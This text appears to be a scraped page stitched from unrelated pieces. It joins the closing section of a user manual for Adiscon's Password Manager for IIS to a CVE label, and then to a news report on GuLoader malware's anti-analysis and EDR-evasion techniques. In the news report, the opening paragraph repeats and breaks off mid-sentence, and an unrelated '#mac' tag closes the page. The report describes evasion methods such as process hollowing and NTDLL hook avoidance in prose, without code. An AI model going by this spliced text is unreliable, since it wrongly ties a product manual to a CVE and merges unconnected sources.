Fax: +49-2235-985032  
Fax option for MasterCard orders, only.

**Liability**

Please use the evaluation period to check if Password Manager for IIS is suitable for you and your system environment. We encourage you to try the product in a test environment. We accept no liability for any damage during the evaluation period.

Liability for registered users is limited to the amount of the registration fee.

**Copyrights**

This documentation as well as the actual Password Manager for IIS product is copyrighted by Adiscon GmbH, Germany.

Microsoft, Windows and Windows NT are registered trademarks of Microsoft Corp., Redmond, WA, USA.

**Other Products of Interest**

You might be interested in other fine system management tools from Adiscon. Be sure to have a look at our products at http://www.Adiscon.com.

CVE-2022-36664: Password Manger for IIS * User Manual * Version 1.0

Cybersecurity researchers have exposed a wide variety of techniques adopted by an advanced malware downloader called GuLoader to evade security software.
"New shellcode anti-analysis technique attempts to thwart researchers and hostile environments by scanning entire process memory for any virtual machine (VM)-related strings," CrowdStrike researchers Sarang Sonawane and Donato Onofri said in a

Cybersecurity researchers have exposed a wide variety of techniques adopted by an advanced malware downloader called **GuLoader** to evade security software.

"New shellcode anti-analysis technique attempts to thwart researchers and hostile environments by scanning entire process memory for any virtual machine (VM)-related strings," CrowdStrike researchers Sarang Sonawane and Donato Onofri said in a technical write-up published last week.

GuLoader, also called CloudEyE, is a Visual Basic Script (VBS) downloader that's used to distribute remote access trojans on infected machines. It was first detected in the wild in 2019.

In November 2021, a JavaScript malware strain dubbed RATDispenser emerged as a conduit for dropping GuLoader by means of a Base64-encoded VBScript dropper.

A recent GuLoader sample unearthed by CrowdStrike exhibits a three-stage process wherein the VBScript is designed to deliver a next-stage that performs anti-analysis checks before injecting shellcode embedded within the VBScript into memory.

The shellcode, besides incorporating the same anti-analysis methods, downloads a final payload of the attacker's choice from a remote server and executes it on the compromised host.

"The shellcode employs several anti-analysis and anti-debugging tricks at every step of execution, throwing an error message if the shellcode detects any known analysis of debugging mechanisms," the researchers pointed out.

This includes anti-debugging and anti-disassembling checks to detect the presence of a remote debugger and breakpoints, and if found, terminate the shellcode. The shellcode also features scans for virtualization software.

An added capability is what the cybersecurity company calls a "redundant code injection mechanism" to avoid NTDLL.dll hooks implemented by endpoint detection and response (EDR) solutions.

NTDLL.dll API hooking is a technique used by anti-malware engines to detect and flag suspicious processes on Windows by monitoring the APIs that are known to be abused by threat actors.

In a nutshell, the method involves using assembly instructions to invoke the necessary windows API function to allocate memory (i.e., NtAllocateVirtualMemory) and inject arbitrary shellcode into memory via process hollowing.

The findings from CrowdStrike also come as cybersecurity firm Cymulate demonstrated an EDR bypass technique known as Blindside that allows for running arbitrary code by using hardware breakpoints to create a "process with only the NTDLL in a stand-alone, unhooked state."

"GuLoader remains a dangerous threat that's been constantly evolving with new methods to evade detection," the researchers concluded.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#mac